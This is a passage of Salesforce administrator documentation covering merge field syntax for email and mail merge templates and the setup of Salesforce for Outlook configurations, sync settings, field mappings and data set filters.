by the object name, a period, the field name and a closing curly brace. For example, if you want to include the account number
of your recipient, you could enter ID: {!Account.AccountNumber}, and your recipient’s email will display ID:
001234567890123.

The syntax for a merge field may differ, depending on where you’re using it in Salesforce. To ensure that you’re using the
correct syntax, select merge fields from the drop-down list in the editor where you’re using the merge field. Most merge fields
for email templates correspond directly with email template fields.

Important:

• If a standard object and custom object have matching names or labels, only the standard object's fields display
when you select from Available Merge Fields.

For example, if you have a custom object and a standard object both called Quote, you won’t be able to select the
custom object. To ensure that you can select merge fields from either object, add a character to make the custom
object’s name and label unique, such as Quote2.

• If two or more custom objects have matching names or labels, only one of the objects displays when you select
from Available Merge Fields. Ensure that all custom objects have unique names and labels so that you can select
merge fields from any of the objects.
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Tips

General Tips

• In email templates, you can add substitute text to any merge field. Substitute text displays in a sent email if the merge
record does not contain data for that field. To add substitute text, place a comma after the field name and enter the
text before the closing bracket, for example: Dear {!Contact.FirstName, Valued Customer}. When you
save the template, the merge field appears in the template as Dear {!BLANKVALUE(Contact.FirstName,
"Valued Customer")}. In this example, if there is no information in the First Name field of the contact record,
the email you create with your template will begin with “Dear Valued Customer”.

• The {!Receiving_User.field_name} and {!Sending_User.field_name} merge fields work only for mass
email and are unavailable in Visualforce email templates.

• User fields are also known as Sending User fields for administrators and users with the “Manage Users” permission.
Use them in email templates when referencing the person sending the email.

• Administrators and users with the “Manage Users” permission can use Receiving User merge fields for email templates
to reference the recipient of the email.

• The Created Date and Last Modified Date fields display only the date, not the date and time.
• If your template contains a merge field for which there is no data in a particular record, that field does not appear in

the email you send. To find blank fields, modify your recipient list view to search for the merge fields you are using
in your template, and enter the criterion “<field> equals,” leaving the third field blank. Edit those records that have
blank fields before you send your emails.

Accounts
When account merge fields are included in an email template and this template is selected after a contact is added to
the email To field, the account merge fields are populated from the contact's account, not the case's account.

Approvals
If the email template you choose contains approval merge fields named {!ApprovalRequest.field_name}, these
fields will return values only when that email template is used as the approval assignment template. If you use the template
for any other email alert action—in either workflow rules or approval processes—the merge fields will return a null value.

Campaigns

• Campaign and campaign member merge fields can be used in email templates, but not mail merge templates.
• Campaign member merge fields cannot be used with other types of merge fields in the same email template. For

example, if you create an email template using a campaign member merge field and you want to include the title of
the recipient, use {!CampaignMember.Title} instead of {!Lead.Title} or {!Contact.Title}.

Cases
If you have enabled Email-to-Case or On-Demand Email-to-Case, you can create email templates that support agents
can use to respond to case emails. These templates can include merge fields that display information from the original
email in the response.

Connection Finder
Custom email templates must contain the survey URL. {!Contact.PartnerSurveyURL} is available as a contact
merge field when creating templates.

Contacts
Templates with contact merge fields can be used to generate email documents for leads. Likewise, you can use lead
templates to generate contact emails and documents.
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Note:  You can only use standard fields when generating email for leads or contacts.

Opportunities
Merge fields for products on opportunities are only available to organizations that have enabled products and can only
be used in mail merge templates, but not email templates.

See Also:
Merge Fields Overview

Merge Fields for Visualforce Email Templates

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Mass email not available in: Personal, Contact Manager, and Group Editions

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Syntax and Formatting

Merge fields for Visualforce email templates use the same expression language as formulas:

{!Object_Name.Field_Name}

For example, you can start your email template with Hello, {!Contact.FirstName}. When you send the template, each
recipient will see their first name in place of the merge field. If your recipient’s first name is John, he will see Hello, John!
when he opens the email.

Tips

• You can’t send a mass email using a Visualforce email template. {!Receiving_User.field_name} and
{!Sending_User.field_name} are used for mass email and aren’t available for Visualforce email templates.

• To translate Visualforce email templates based on recipients’ or related objects’ languages, use the
<messaging:emailTemplate> tag’s language attribute. Valid values are Salesforce-supported language keys, such as
“en-us” for English (US). The language attribute accepts merge fields from the email template’s recipientType and
relatedToType attributes. You create custom language fields for use in the merge fields. The Translation Workbench
is required to translate email templates.

See Also:
Creating Visualforce Email Templates
Merge Fields Overview
Developer's Guide: Visualforce Developer's Guide
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Merge Fields for Mail Merge Templates

Available in: All Editions except Database.com

A merge field is a field you can put in an email template, mail merge template, custom link, or formula to incorporate values
from a record.

Syntax and Formatting

Mail merge templates are created by uploading documents to Salesforce from your desktop. The syntax for these merge fields
is OBJECT_FIELD_NAME or FIELD_NAME. Merge fields for mail merge templates must:

• Be unique
• Contain only letters, numbers, and the underscore (_) character
• Not exceed 40 characters

For example: AccountNumber. To ensure you’re using the correct syntax, use Connect for Office to insert merge fields into
your mail merge template.

Compatibility with Other Features

• For opportunity mail merges, you can use contact merge fields to merge additional information about a related contact.
• Merge fields for products on opportunities are only available to organizations that have enabled products.
• Approval process merge fields can be used in email templates, but not mail merge templates.
• Campaign and campaign member merge fields cannot be used in mail merge templates.

Tips

Templates with contact merge fields can be used to generate mail merge documents for leads. Likewise, you can use lead
templates to generate contact documents.

Note:  You can only use standard fields when generating mail merge documents for leads or contacts.

See Also:
Mail Merge Overview
Merge Fields Overview
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Managing Version Settings for Visualforce Email Templates

Available in: Contact Manager, Group, Professional, Enterprise, Unlimited, and Developer Editions

Mass email not available in: Personal, Contact Manager, and Group Editions

User Permissions Needed

“Customize Application”To set version settings for Visualforce email templates:

To aid backwards-compatibility, each Visualforce email template is saved with version settings for the specified version of
Visualforce and the API. If the Visualforce email template references installed managed packages, the version settings for each
managed package referenced by the Visualforce component are saved too. This ensures that as Visualforce, the API and the
components in managed packages evolve in subsequent versions, a Visualforce email template is still bound to versions with
specific, known behavior.

A package version is a number that identifies the set of components uploaded in a package. The version number has the format
majorNumber.minorNumber.patchNumber (for example, 2.1.3). The major and minor numbers increase to a chosen value
during every major release. The patchNumber is generated and updated only for a patch release. Publishers can use package
versions to evolve the components in their managed packages gracefully by releasing subsequent package versions without
breaking existing customer integrations using the package.

To set the Salesforce API and Visualforce version for an existing Visualforce email template:

1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click the Email Template Name for the Visualforce email template.
3. Click Edit Template and then click Version Settings.
4. Select the Version of the Salesforce API. This is also the version of Visualforce used with this template.
5. Click Save.

To configure the package version settings for a Visualforce email template:

1. Do one of the following:

• If you have permission to edit public templates, from Setup, click Communication Templates > Email Templates.
• If you don’t have permission to edit public templates, at the top of any Salesforce page, click the down arrow next to

your name. From the menu under your name, select Setup or My Settings—whichever one appears. Then from the
left side of the page, click Email > My Templates.

2. Click the Email Template Name for the Visualforce email template.
3. Click Edit Template and then click Version Settings.
4. Select a Version for each managed package referenced by the Visualforce email template. This version of the managed

package will continue to be used by the Visualforce email template if later versions of the managed package are installed,
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unless you manually update the version setting. To add an installed managed package to the settings list, select a package
from the list of available packages. The list is only displayed if you have an installed managed package that is not already
associated with the Visualforce email template.

5. Click Save.

Note the following when working with package version settings:

• If you save a Visualforce email template that references a managed package without specifying a version of the managed
package, the Visualforce email template is associated with the latest installed version of the managed package by default.

• You cannot Remove a Visualforce email template's version setting for a managed package if the package is referenced by
the Visualforce email template.

See Also:
Creating Visualforce Email Templates
Creating Text Email Templates
Creating HTML Email Templates
Creating Custom HTML Email Templates

ADMINISTERING SALESFORCE FOR OUTLOOK

Salesforce for Outlook System Requirements
Available in: Group, Professional, Enterprise, Unlimited, Developer, and Contact Manager Editions; and Trial
organizations

Before you download and install Salesforce for Outlook v2.2.0 or later, make sure your system meets these requirements.

Must be any of these versions ofYour

Microsoft® Outlook® using Microsoft Exchange Server, along with the latest hot fixes.Default email program
• 2013

• 2010

• 2007

Salesforce for Outlook doesn’t support Outlook installed using Click-to-Run (a streaming installer
for Microsoft Office).

Microsoft Windows®, along with the latest hot fixes.Operating system
• Windows 8

• Windows 7

• Windows Vista® (32-bit only)

• Windows XP (32-bit only)
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Must be any of these versions ofYour

We don’t support using Salesforce for Outlook with Apple® Mac OS®.

Other Requirements for Servers, Installers, and Single Sign-On

It’s important to know thatFor

We support using these systems that connect to the Internet through a
proxy server.

Server
configurations

• Automatic proxy detection
• Manual proxy
• NTLM proxy authentication

We don’t support using:
• IMAP and POP3 email servers
• Terminal servers, such as Citrix® servers

If you’re an administrator and plan to use the .msi installer, you may need
to install the following additional tools:

Installers

• Microsoft .NET Framework 4
• Microsoft Visual Studio® 2010 Tools for Office Runtime
• Primary Interop Assemblies (PIA) Redistributable for your version of

Microsoft Outlook

Microsoft® Windows Vista® and Windows 7 .msi users must run the
command prompt as an administrator and then launch the installer from
the command line, such as from the command msiexec /i
SalesforceForOutlook.msi.

We support using either:Single Sign-On
• Delegated authentication
• Security Assertion Markup Language (SAML) with My Domain

We don’t support using a separate online identity provider for single sign-on.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Installing and Setting Up Salesforce for Outlook
Salesforce for Outlook Supported Languages
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Salesforce for Outlook Configurations Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

If your organization uses Professional, Enterprise, Unlimited, or Developer Editions, you’ll use Salesforce for Outlook
configurations.

A Salesforce for Outlook configuration is a set of parameters that determine the data that Salesforce for Outlook users can
sync between Microsoft® Outlook® and Salesforce. You can create multiple configurations to simultaneously suit the needs
of different types of users. For example, an opportunity team might want to sync everything, while a manager might only want
to sync events. Users may be able to edit some of their own settings.

To manage your configurations, click Desktop Administration > Outlook Configurations.

A configuration,If you want to

Click New Outlook Configuration.Create

Click Edit.Edit

Click Del.Delete

Click its name.View details
about

Select the configuration you want to clone and click Clone.Clone

Click Edit next to the configuration, select Active, and click Save.Activate

Click Edit next to the configuration, deselect Active, and click Save. If the configuration’s users are listed
on another active configuration through a profile, that configuration is used the next time they open Outlook.
Otherwise, removed users are unable to use Salesforce for Outlook.

Deactivate

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Creating Salesforce for Outlook Configurations
Defining Data Sets for Salesforce for Outlook
Default Salesforce for Outlook Configuration
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Creating Salesforce for Outlook Configurations
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

1. From Setup, click Desktop Administration > Outlook Configurations.
2. Click New Outlook Configuration.
3. Enter a name and description of the configuration.
4. Select Active to activate the configuration.
5. Make sure Notify of product updates is selected if you want users to see system tray alerts when new versions of

Salesforce for Outlook are available for download. Users are alerted every 14 days until they download the new version or
hide system tray alerts.

6. Depending on the configuration, you’ll need to define some or all of these settings.

• Assigned users and profiles
• Email-related options for the Salesforce Side Panel, as well as add email and create cases
• Sync direction
• Conflict behavior
• Field mappings
• Matching criteria
• Modification permissions
• Advanced settings

7. Click Save.
8. Define data sets.

When users log in to Salesforce from the Salesforce for Outlook setup wizard, these settings take effect immediately. If you
deactivate a configuration and the assigned users are listed on another active configuration through a profile, the active
configuration is used the next time they open Outlook.

See Also:
Syncing Microsoft Outlook with Salesforce Using Salesforce for Outlook
Default Salesforce for Outlook Configuration
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Assigning Users to Salesforce for Outlook Configurations

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

After you define basic information for a Salesforce for Outlook configuration, you select the Salesforce for Outlook users that
the configuration’s settings will apply to.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. If you’re modifying an existing Outlook configuration, click Edit next to the one you want to modify. Otherwise, click

New Outlook Configuration, and complete any required fields.
3. In the Assign Users and Profiles section, select either Profiles or Users in the Search drop-down list.
4. If you don’t see the member you want to add, enter keywords in the search box and click Find.
5. Select members from the Available Members box, and click Add to add them to the group. If all available users are assigned

to this configuration, the Users list is empty and you can only assign profiles.
6. To remove members, select those members and click Remove. If removed users are assigned to another active configuration

through a profile, that other configuration is used the next time they open Outlook. Otherwise, removed users are unable
to use Salesforce for Outlook.

7. Click Save. All changes take effect the next time data syncs for the users in this configuration. If you assign a user who is
already assigned to a different configuration, that user is removed from the other configuration and assigned to this one.
If an assigned user is also part of a profile assigned to another active configuration, the configuration that lists the user
directly is used.

See Also:
Creating Salesforce for Outlook Configurations
Salesforce for Outlook Configurations Overview
Enabling Email Options for Salesforce for Outlook
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Defining Data Settings for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Data settings control the sync behavior and email functionality of Salesforce for Outlook. You can define the following settings
using the Data Settings fields in a Salesforce for Outlook configuration.

• Email-related options for the Salesforce Side Panel, as well as add email and create cases

• Sync direction

• Conflict behavior

• Field mappings

• Matching criteria

• Modification permissions

Enabling Email Options for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

“Customize Application”To enable Add Email, Side Panel, and Create Case:

You can set up Salesforce for Outlook email options for:

• Adding emails from Outlook to Salesforce

• Displaying the Salesforce Side Panel in Microsoft® Outlook®

• Creating Salesforce cases from Outlook emails

Enabling the Add Email Feature

This adds the Add Emails and Send and Add buttons to Outlook, and lets your users add up to 10 emails simultaneously to
Salesforce.
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Emails that you add using Salesforce for Outlook are saved in Salesforce and assigned to other records based on your My
Email to Salesforce settings.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. If you’re modifying an existing Outlook configuration, click Edit next to the one you want to modify. Otherwise, click

New Outlook Configuration, and complete any required fields.
3. Select Add Email.
4. Click Save.
5. If you don’t already have Email to Salesforce enabled, click Enable in the popup message to enable both features.

Enabling the Salesforce Side Panel

Enabling the Salesforce Side Panel lets your users select an email in Outlook, and see Salesforce contacts and activities related
to that email.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. If you’re modifying an existing Outlook configuration, click Edit next to the one you want to modify. Otherwise, click

New Outlook Configuration, and complete any required fields.
3. Select Side Panel.
4. Click Save.

Enabling the Create Case Feature

This adds the Create Cases drop-down list button to Outlook, and lets your users create Salesforce cases from Outlook emails.

Note:  Before you can enable the Create Case feature, review and complete the procedures in Setting Up Create Case
for Salesforce for Outlook Users on page 1627. Then, return to this topic to complete the following procedure.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. If you’re modifying an existing Outlook configuration, click Edit next to the one you want to modify. Otherwise, click

New Outlook Configuration, and complete any required fields.
3. Select Create Case. Then, choose one of the following links.

• Recommended: Choose an Existing Create Case Destination, which lets you choose existing destinations. You can
choose up to 10 destinations for each Outlook configuration.

• Create a New Create Case Destination. If you need to create a new one, you need to first save your work, create the
new destination, and then return to the Outlook Configuration page to complete the Create Case setup requirements.

4. Click Save.

See Also:
Adding Email with Salesforce for Outlook
Editing Your Salesforce for Outlook Email Settings
Creating Salesforce for Outlook Configurations
Assigning Users to Salesforce for Outlook Configurations
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Understanding How Enabling Recurring Events Affects Users

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Your Salesforce and API users can expect the following changes after you enable the Salesforce for Outlook Recurring Events
feature.

You should know thatFor

Changes made to a series don’t affect past events.

Changes made to any fields in an event series override changes previously made to single events.

Salesforce users

In addition, if a user changes any of the following fields, all events in the series are deleted and re-created.
As a result, the status of all invitees is reset to Not Responded, and links to future events in the series
break. Any triggers set on the event are also affected.

• Location

• Event start or end time

• All-day event

• Frequency

• Recurrence start date, if a user sends updates to invitees

If a user doesn’t send updates, and the only change is to extend the recurrence end date, the response
status of invitees isn’t reset.

After users start syncing recurring events, the following read-only API objects appear in the API.API users

• EventRecurrenceException

• TaskRecurrenceException

See Also:
Enabling Email Options for Salesforce for Outlook
Salesforce for Outlook Configurations Overview

Setting Up Create Case for Salesforce for Outlook Users

Available in: Professional, Enterprise, Unlimited, and Developer Editions

The Create Case feature in Salesforce for Outlook lets users create cases in Salesforce from emails in Microsoft® Outlook®.
As an administrator, you can create Email-to-Case destinations that appear in the drop-down list button Create Cases in
Outlook. For each destination, you choose the assignee, which can be either individual users or queues. You can add up to 10
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destinations for each Outlook configuration. When users create cases, they can add up to 10 emails simultaneously for each
destination.

Before Salesforce for Outlook users can create cases from Outlook emails, you’ll need to perform the following procedures.

1. If you haven’t already done so, enable and configure On-Demand Email-to-Case.
2. Define Email-to-Case destinations (also known as email routing addresses).
3. Enable the Create Case feature in your configurations, which adds the Create Cases drop-down list button in Outlook.

Salesforce for Outlook assigns a category to the emails that Salesforce for Outlook users add as cases to Salesforce. This
category, Added to Salesforce as a case, makes it easy for users to search for emails they added as cases to Salesforce.

See Also:
Creating Salesforce for Outlook Configurations
Enabling Email Options for Salesforce for Outlook

Defining Sync Directions for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Sync direction indicates the direction data flows when Salesforce for Outlook syncs data.

1. Click Desktop Administration > Outlook Configurations.
2. Create or edit a configuration, and select one of these sync directions under Data Settings for each object being synced.

• Don't sync—Outlook and Salesforce records aren't synced, and you can't select an Outlook folder to sync within
the setup wizard.

• Salesforce.com to Outlook—When data first syncs, a record in Salesforce creates or updates a record in
Outlook. During future syncs, changes made to Salesforce records appear in Outlook, regardless of whether the Outlook
version of the record has changed. In addition, deleting a synced record in Salesforce deletes its Outlook counterpart.
Outlook changes are never sent to Salesforce. The required conflict behavior setting for this option is Salesforce.com
always wins.

• Outlook to salesforce.com—During its first sync, a record in Outlook creates or updates a record in Salesforce.
During future syncs, changes made to Outlook records appear in Salesforce, regardless of whether the Salesforce version
has changed. In addition, deleting a synced record in Outlook deletes its Salesforce counterpart. Salesforce changes are
never sent to Outlook. The required conflict behavior setting for this option is Outlook always wins. This option
isn't available for contacts.

• Sync both ways—When records sync, changes to Outlook records are reflected in Salesforce, and vice versa. If
records conflict, the conflict behavior setting determines which record wins.
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3. Click Save. All changes take effect the next time data syncs for the users in this configuration.
4. Define a data set for each object that has a sync direction.

See Also:
Salesforce for Outlook Configurations Overview
Enabling Email Options for Salesforce for Outlook
Creating Salesforce for Outlook Configurations
Defining Data Sets for Salesforce for Outlook

Defining Conflict Behavior for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Conflict behavior settings determine what happens when Salesforce for Outlook encounters a conflict when syncing data both
ways. A conflict occurs when the same record is updated in both Salesforce and Outlook or when a record is updated on one
side and deleted in the other.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. Edit a configuration, and select one of the following conflict behaviors under Data Settings for Contacts, Events, and

Tasks.

• Salesforce.com always wins

• Outlook always wins

3. Click Save. All changes take effect the next time data syncs for the users in this configuration.

See Also:
Salesforce for Outlook Configurations Overview
Creating Salesforce for Outlook Configurations
Mapping Fields for Salesforce for Outlook
Defining Sync Directions for Salesforce for Outlook
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Mapping Fields for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Field mappings define which Salesforce and Outlook fields correspond when records sync with Salesforce for Outlook.
Salesforce comes with a set of default mappings. You may be able to change some of them.

To map fields:

1. Click Desktop Administration > Outlook Configurations
2. Under Data Settings, click Edit Field Mappings to display the list of available fields.
3. Choose a field from the Salesforce Field picklist. This list displays the names of all Salesforce fields that haven't yet

been mapped.

Warning:  If you map a custom field that is universally required, make sure it has a default value to avoid errors.
Also, note that mapping custom fields that require validation by Salesforce may cause sync errors. For example,
if you map a custom Salesforce field that requires a unique value, you'll get a uniqueness error when you sync if
you enter a non-unique value in the Outlook field.

4. Choose a field from the Outlook Field picklist next to the selected Salesforce.com field. This list displays the names
of all standard Outlook fields that haven't yet been mapped and that match the data type of the corresponding Salesforce
field.

5. To map a Salesforce field to a custom Outlook field, select Custom Field... from the end of the corresponding
Outlook Field picklist. Enter the field's name and click OK.

The custom field must already exist in Outlook. Letters are not case-sensitive, and these characters aren't allowed: [, ], _,
#. The first sync validates that the custom Outlook field exists and then maps it to the Salesforce field. Custom Outlook
fields use a string data type. Note that we only allow custom fields for Salesforce text fields and non-restricted picklists.

6. To remove a field mapping, click the delete icon to the right of the mapping. To redo the mapping, just add a new mapping
to the bottom of the list. To view your mappings, click View under Field Mapping on the detail page.

7. Click Save. All changes take effect the next time data syncs for the users in this configuration.
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Note: You can map custom Salesforce fields to standard or custom Outlook fields. You can't map picklist values.

See Also:
Creating Salesforce for Outlook Configurations
Salesforce for Outlook Configurations Overview
Defining Matching Criteria for Salesforce for Outlook
Defining Conflict Behavior for Salesforce for Outlook

Defining Matching Criteria for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

If Salesforce for Outlook finds multiple matching contacts when a contact first syncs from Outlook, we pick a Salesforce
contact based on the matching criteria you define here.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. Edit a configuration, and select one of these matching criteria options under Data Settings for contacts.

• Most recent activity—Choose the Salesforce contact that shows the most recent activity (such as a phone call
or email), as shown in the contact's Activity History related list. This is the default matching option.

• Last updated—Choose the Salesforce contact that was most recently modified.
• Oldest—Choose the Salesforce contact that has the earliest creation date.

3. Click Save. All changes take effect the next time data syncs for the users in this configuration.

If we don't find a matching contact in Salesforce, we create a new contact that syncs with the Outlook contact. We then either
automatically assign the synced contact to a Salesforce account, leave it unassigned, or place it in the user's My Unresolved
Items page to be manually assigned.

See Also:
Creating Salesforce for Outlook Configurations
Salesforce for Outlook Configurations Overview
Mapping Fields for Salesforce for Outlook
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Letting Users Modify Salesforce for Outlook Settings

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

1. From Setup, click Desktop Administration > Outlook Configurations.
2. Edit a configuration, and select any of the following options under Data Settings for each object being synced. You can

allow users to modify:

• Whether object is synced

• Sync direction

• Conflict behavior

• Field mappings

3. Click Save. All changes take effect the next time data syncs for the users in this configuration.

You can overwrite users’ modifications any time by selecting Overwrite configuration changes made by users
in a configuration. After you save the updated configuration, the new settings replace the existing settings for users of the
configuration the next time their data syncs.

Defining Advanced Settings for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Use advanced settings in a Salesforce for Outlook configuration to customize the default behavior of Salesforce for Outlook,
such as setting the maximum size of the sync log. Click Edit to change the value of an advanced setting or Remove to remove
it from the configuration.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. If you’re modifying an existing Outlook configuration, click Edit next to the one you want to modify. Otherwise, click

New Outlook Configuration, and complete any required fields.
3. Click Add Advanced Setting in the Advanced Settings section of an Outlook configuration.
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4. Choose one of these settings and enter a value.

This setting indicatesAdvanced Setting

The number of seconds Salesforce for Outlook waits while trying to establish an HTTP
connection with Salesforce. The value must be between 15 and 360 seconds, and the default
is 30.

HTTPTimeout

The maximum file size of the sync log you'll maintain. Value must be between 1 and 128 MB,
and the default is 1.

MaxLogFileSize

The number of times Salesforce for Outlook tries to connect to Salesforce. The value must be
between 0 and 10, and the default is 3.

MaxRetries

5. Click OK.
6. Click Save. All changes take effect the next time data syncs for the users in this configuration.

See Also:
Creating Salesforce for Outlook Configurations
Salesforce for Outlook Configurations Overview
Defining Data Sets for Salesforce for Outlook

Default Salesforce for Outlook Configuration

Available in: Contact Manager and Group Editions

If your organization uses either Contact Manager or Group Editions, you’ll use the default Salesforce for Outlook configuration,
which includes these settings for your users..

IsThe setting for

Enabled if Email to Salesforce is turned on.Add Email

Contacts • Sync Direction—Sync both ways

• Conflict Behavior—Outlook always wins

• Filters

Contacts: User's Records
Contacts on Accounts: User's Records
Contacts in Chatter: Records User is Following

• Field Mapping—Default settings

• Matching Criteria—Most recent activity

Events • Sync Direction—Sync both ways
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IsThe setting for

• Conflict Behavior—Outlook always wins

• Filters

User's Records
Date greater or equal to LAST 30 DAYS

• Field Mapping—Default settings

Tasks • Sync Direction—Sync both ways

• Conflict Behavior—Salesforce.com always wins

• Filters

User's Records
Due date greater or equal to LAST 30 DAYS

• Field Mapping—Default settings

Defining Data Sets for Salesforce for Outlook
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Sync Direction can’t be Don't syncTo create, edit, or delete data sets:

Data sets are subsets of the Salesforce records that Salesforce for Outlook users can sync. They consist of filters that limit
which records will sync. Each configuration must have a data set in order for users to sync with Outlook.

The Outlook Configuration detail page shows a summary of the configuration’s current filters.

1. From Setup, click Desktop Administration > Outlook Configurations.
2. Click the name of an Outlook configuration.
3. In the Data Sets related list, click Edit.
4. Specify filters.
5. To see how many items will sync, you can check the data set size.
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6. Click Save.

See Also:
Sample Salesforce for Outlook Data Sets
Tips on Entering Salesforce for Outlook Contact Filters
Salesforce for Outlook Configurations Overview
Checking the Size of Salesforce for Outlook Data Sets

Learning about Data Sets for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

Sync Direction can’t be Don't syncTo create, edit, or delete data sets:

Data sets are subsets of the Salesforce records that Salesforce for Outlook users can sync. They consist of filters that limit
which records will sync.

Knowing What Syncs

Salesforce for Outlook syncs records based on definitions in data sets, along with records related to them.

Understanding Limits to Data Sets

When using data sets, users can sync up to 5,000 records per filter between Microsoft® Outlook® and Salesforce at a time.
This means that if users have more than 5,000 records to sync based on the configuration of their data sets, Salesforce for Outlook
won't sync some of them. In addition, users may find that syncing these large quantities of records may slow down the sync
process. You can, however, increase the limits for the number of records users can sync. Just keep in mind that you can't reduce
the likelihood of the sync process slowing down.

Increasing Limits to Data Sets

If your users are working with more than 5,000 records, you can configure their data sets so that they can sync larger quantities
of records. To do this, you'll their edit data sets to include additional filters. For example, under Filter By Record Ownership
in the Contact Filters section, choose Selected Contacts. Then, choose User's Records under Contacts, Contacts on
Opportunities, and Contacts on Accounts. Because the data set now has three filters, your users can now sync up to 15,000
contact records.

Keep in mind that these various filters you set up won't necessarily select records that are mutually exclusive. Therefore, the
sync process might not sync exactly 15,000 records. To avoid this situation, you can further refine the group of contacts you
want to sync. Just define additional parameters under Filter By Additional Objects and Fields.
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After defining the filters, you can get a record count for your users in the Data Set Size section. To do so, enter a user, and
then click Get Record Count. If your users still exceed sync limits for the filters you set up, you users may find that the sync
process selects records in a random fashion.

About Person Accounts

If your organization enabled person accounts and your users have more than 5,000 records in Salesforce, data sets work in a
different way. Specifically, Salesforce runs a query first on person accounts that match filter criteria, and then on contacts
assigned to these accounts. So it's possible for the sync process to reach the 5,000 record limit (including person accounts and
contacts) and not include some of the contacts your users would expect to sync.

See Also:
Configuring Contact Filters for Salesforce for Outlook
Entering Event Filters for Salesforce for Outlook
Entering Task Filters for Salesforce for Outlook
Checking the Size of Salesforce for Outlook Data Sets

Configuring Contact Filters for Salesforce for Outlook

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view configurations:

“Manage Email Client Configurations”To create, edit, or delete configurations:

“Opportunity Team Selling”To filter contacts by opportunity teams:

“Account Teams”To filter contacts by account teams:

Sync Direction can’t be Don't syncTo create, edit, or delete data sets:

Data sets are subsets of the Salesforce records that Salesforce for Outlook users can sync. They consist of filters that limit
which records will sync. For example, you may want to let certain users sync all contacts, but let other users sync only contacts
related to their opportunity teams. In addition, you can filter by the fields in the records, such as letting users sync only contacts
related to specific accounts and opportunities.

The Outlook Configuration detail page shows a summary of the configuration’s current filters.

1. Define a data set for a configuration.
2. Under Filter By Record Ownership, specify the contacts users can sync.
3. If you choose Selected Contacts, you can further limit which contacts users sync.

SelectTo allow users to syncFor

User's RecordsAll contacts that they ownContacts
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SelectTo allow users to syncFor

User's Team's RecordsAll contacts they and their subordinates in the
role hierarchy own

User's RecordsContacts related to their opportunitiesContacts on
Opportunities

User's Team's RecordsContacts related to opportunities that they and
their subordinates in the role hierarchy own

User's Opportunity Teams' RecordsContacts related to opportunities of which they
are members of opportunity teams, but not
opportunities that users own

User's RecordsContacts related to their accountsContacts on Accounts

User's Team's RecordsContacts related to accounts they and their
subordinates in the role hierarchy own

User's Account Teams' RecordsContacts related to accounts of which they are
a team member, but not accounts that users own

4. Under Filter By Additional Objects and Fields, add field-level filters you need.

a. Select an object and a field within that object.
b. Select the correct filter operator.
c. Enter a value for the selected field.

5. To add a new filter, click Add Row; to delete the last one in the list, click Remove Row.
6. Under Other Contacts to Include, you can choose to have Chatter contacts automatically sync for users of this configuration.

To do this, select Sync contacts users follow in Chatter.

See Also:
Tips on Entering Salesforce for Outlook Contact Filters
Defining Data Sets for Salesforce for Outlook
Checking the Size of Salesforce for Outlook Data Sets
Sample Salesforce for Outlook Data Sets

Tips on Entering Salesforce for Outlook Contact Filters

Available in: Professional, Enterprise, Unlimited, and Developer Editions

Contact filters control the number of records that Salesforce for Outlook users can sync between Outlook and Salesforce. Note
the following when using contact filters.

• The criteria you specify are AND based. That is, if you specify more than one criterion, the result includes only records
that match all of the criteria.
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• If entering a date, use the format allowed by your Locale setting. You can also use special date values like TODAY,
NEXT WEEK, NEXT YEAR, LAST <number> DAYS, and so on.

• Place quotation marks around numbers or other data that includes commas. For example Amount equals "10,000"
returns records that have an amount of $10,000 but Amount equals 10,000 returns $10,000 as well as $10 and $0.

